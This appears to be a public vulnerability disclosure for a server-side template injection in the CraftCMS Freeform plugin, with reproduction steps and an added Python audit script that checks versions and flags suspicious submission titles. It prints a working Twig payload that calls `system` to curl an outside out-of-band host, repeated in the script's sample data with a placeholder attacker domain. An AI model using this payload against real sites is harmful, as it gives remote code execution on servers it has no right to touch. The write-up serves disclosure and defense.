TimTrademark/CVE-2025-52122

CVE CraftCMS Freeform

CraftCMS Freeform contains a server-side template injection (SSTI) vulnerability in the form's submission title, resulting in arbitrary code injection for every user who has access to editing a form.

Vulnerable versions are v5.0.0 up to, but not including, v5.10.16.

Steps to reproduce

Create a form:

[Image: create a form]

I created the form "pentest" here as a proof of concept. Next, under Settings, set the following submission title (change the domain name to your own server):

{{ 'system' | call('curl http://gwgyynafr4feu5xecukf1h2nqew5kw8l.oastify.com/rce') }}

[Image: submission title]

This will execute an arbitrary system call. In this case, I perform a curl to a server under my control that will notify me of incoming connections. Next, include this form in a template/page and submit it:

<h1>test</h1>
{% set form = freeform.form('pentest') %}

{% if form %}
  {{ form.render() }}
{% else %}
  <p>Form not found.</p>
{% endif %}

This triggers the curl command. We can verify it by looking at the incoming HTTP request that was created:

[Image: incoming connection]

The root cause of this issue is that Freeform implements the "call" Twig filter without validating user input, so any string a form editor places in the submission title is evaluated as a Twig expression at submission time. This was fixed in the following commit.
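For defenders, the two checks worth automating are (1) whether the installed Freeform version falls inside the affected range stated above and (2) whether any existing form's submission title already contains an application of the `call` filter. The following script is an added example and is not part of this repository or of Freeform; it assumes you have exported each form's handle and submission-title template into a plain dict (the `SAMPLE_FORMS` data below is constructed for illustration), and it only reports findings, it does not evaluate any template.

```python
"""Audit helpers for the Freeform submission-title SSTI (CVE-2025-52122).

Added example, not the repository's own code. It assumes form handles and
submission-title templates have been exported into a dict; it never renders
or executes the templates it inspects.
"""
import re
from typing import Dict, List, Tuple

# Affected range as stated in the write-up: 5.0.0 <= version < 5.10.16
VULN_MIN = (5, 0, 0)
FIXED_AT = (5, 10, 16)

# Twig filter application of "call", e.g. {{ 'system' | call('...') }}
CALL_FILTER_RE = re.compile(r"\|\s*call\s*\(", re.IGNORECASE)
# Any Twig output or tag block, so hits are reported with their full context
TWIG_BLOCK_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.DOTALL)


def parse_version(version: str) -> Tuple[int, int, int]:
    """Parse 'v5.10.15' or '5.10.15' into a comparable (major, minor, patch) tuple."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)(?:[-+].*)?", version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_vulnerable_version(version: str) -> bool:
    """True when the installed Freeform version is inside the affected range."""
    return VULN_MIN <= parse_version(version) < FIXED_AT


def find_call_filter_usage(template: str) -> List[str]:
    """Return every Twig block in the template that applies the `call` filter."""
    return [
        block for block in TWIG_BLOCK_RE.findall(template)
        if CALL_FILTER_RE.search(block)
    ]


def audit_submission_titles(forms: Dict[str, str]) -> Dict[str, List[str]]:
    """Map form handle -> suspicious Twig blocks found in its submission title.

    Forms whose title contains no `call` filter are left out of the result.
    """
    findings: Dict[str, List[str]] = {}
    for handle, title in forms.items():
        hits = find_call_filter_usage(title)
        if hits:
            findings[handle] = hits
    return findings


# Constructed sample data: one benign title and one following the pattern
# from the write-up (domain replaced with a placeholder).
SAMPLE_FORMS = {
    "contact": "Contact from {{ form.name }}",
    "pentest": "{{ 'system' | call('curl http://attacker.invalid/rce') }}",
}

if __name__ == "__main__":
    print("installed version vulnerable:", is_vulnerable_version("5.10.15"))
    for handle, hits in audit_submission_titles(SAMPLE_FORMS).items():
        print(f"form {handle!r}: {hits}")
```

The regex-based scan is deliberately coarse: it flags any `| call(` inside a Twig block, so a reviewer should inspect each hit rather than treat the output as proof of compromise. During incident response the same audit can be run over historical project-config revisions to see when a suspicious title was introduced.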

About

Arbitrary code injection in CraftCMS Freeform 5.0.0 < 5.10.16
